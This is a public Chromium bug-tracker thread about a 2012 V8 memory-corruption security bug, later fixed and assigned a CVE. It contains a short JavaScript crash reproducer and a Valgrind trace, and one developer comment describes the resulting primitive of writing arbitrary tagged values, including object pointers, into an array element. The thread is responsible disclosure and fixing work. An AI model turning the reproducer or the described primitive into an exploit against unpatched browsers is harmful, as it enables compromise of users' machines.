New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user

Issue metadata

Status: Fixed
Closed: May 2012
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Sign in to add a comment

[LangFuzz] Crash in v8::internal::ShortCircuitConsString with invalid read

Reported by, May 14 2012

Issue description

The JavaScript code below crashes d8 shell (tested on branch 3.10 revision 11522, which is in the latest Chromium dev 20.0.1132.3) on heap with an invalid write to a strange address. 

I was not able to get a trace in Chromium itself because my test uses gc() and I don't have a debug build available that allows using --expose-gc (does Google provide Linux debug builds for download?)

Chrome Version: 20.0.1132.3 dev (only tested through shell rev 11522)
Operating System: Ubuntu 12.04 64 bit

function KeyedStoreIC(a) { a[(1)] = Math.E; }
var literal = [1.2];
literal.length = 0;
literal.push('0' && 0 );

Type of crash: tab
Crash State:

Valgrind trace in d8:

==19952== Invalid read of size 8
==19952==    at 0x52E7BC: v8::internal::ShortCircuitConsString(v8::internal::Object**) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x5378A0: v8::internal::FlexibleBodyVisitor<v8::internal::StaticMarkingVisitor, v8::internal::FixedArray::BodyDescriptor, void>::Visit(v8::internal::Map*, v8::internal::HeapObject*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x53AD80: v8::internal::MarkCompactCollector::EmptyMarkingDeque() (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4FD6E5: v8::internal::Isolate::Iterate(v8::internal::ObjectVisitor*, v8::internal::ThreadLocalTop*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4A7388: v8::internal::Heap::IterateStrongRoots(v8::internal::ObjectVisitor*, v8::internal::VisitMode) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x53BA3F: v8::internal::MarkCompactCollector::MarkLiveObjects() (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x5404B8: v8::internal::MarkCompactCollector::CollectGarbage() (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4ABE07: v8::internal::Heap::PerformGarbageCollection(v8::internal::GarbageCollector, v8::internal::GCTracer*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4AC623: v8::internal::Heap::CollectGarbage(v8::internal::AllocationSpace, v8::internal::GarbageCollector, char const*, char const*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4ACE6A: v8::internal::Heap::CollectAllGarbage(int, char const*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x46CC4E: v8::internal::GCExtension::GC(v8::Arguments const&) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x43D1F7: v8::internal::Builtin_HandleApiCall(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>, v8::internal::Isolate*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==  Address 0x4005bf0a8b145768 is not stack'd, malloc'd or (recently) free'd

Status: Assigned
Danno, can you please take a look.

Christian, you can download asanified chromium debug builds from

Comment 2 by, May 14 2012


Comment 3 by, May 15 2012

I am virtually positive that this is the same as chromium:117409, which was fixed on May 9th on V8 trunk but just rolled into Chromium today. I'll double check. It is also in Chrome 20 and Chrome 19, but not Chrome 18. I'm waiting for the merge until we verify that the fix is stable in Canary.
I'm always testing on v8-trunk, not on the branches, and it reproduced for me on trunk when I reported it here.

Comment 5 by, May 15 2012

Looks like there's still a problem, this seems to be a new variant on the theme of 117409. Investigating. 

Comment 6 by, May 15 2012

It is similar but a slightly different case than 117409. Patch in progress, it will need to be marged back to 18 and 19. This bug allows you to reliably write the first element of a JSArray with any value that you can represent in the lower 32 bits of a IEEE double precision floating point number and later interpret as a tagged value, including as a object pointer.

Comment 7 by, May 15 2012

Labels: SecSeverity-High SecImpacts-Stable SecImpacts-Beta reward-topanel
Labels: -Pri-0 -Area-Undefined Pri-1 Area-Internals WebKit-JavaScript OS-All Mstone-19
Danno, isnt 117409 a security bug too, we need the tracking flags.

Comment 11 by, May 16 2012

Yes, sorry, 117409 is also a security bug, I thought it was already marked so. I've changed it to restrict viewing to the security team and be typed as a Security bug. Chris, can you please work your magic on the other security labels.

Comment 12 by, May 21 2012

Fix has been committed to trunk/Canary and merged back to 3.10 ( and 3.9 ( 
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
Labels: -Merge-Approved Merge-Merged
Labels: -reward-topanel reward-1000 reward-unpaid
Nice find decoder. $1000
Labels: CVE-2011-3115
Status: Fixed
Fixed with the release of 19.0.1084.52
Labels: -reward-unpaid
Project Member

Comment 20 by, Mar 10 2013

Labels: -Type-Security -Area-Internals -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -WebKit-JavaScript -Mstone-19 M-19 Cr-Content-JavaScript Security-Impact-Stable Security-Impact-Beta Cr-Internals Security-Severity-High Type-Bug-Security
Labels: -Restrict-View-SecurityNotify
Project Member

Comment 22 by, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Project Member

Comment 23 by, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 24 by, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 25 by, Apr 6 2013

Labels: Cr-Blink
Project Member

Comment 26 by, Apr 6 2013

Labels: -Cr-Content-JavaScript Cr-Blink-JavaScript
Project Member

Comment 27 by, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 28 by, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot
Project Member

Comment 29 by, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted

Sign in to add a comment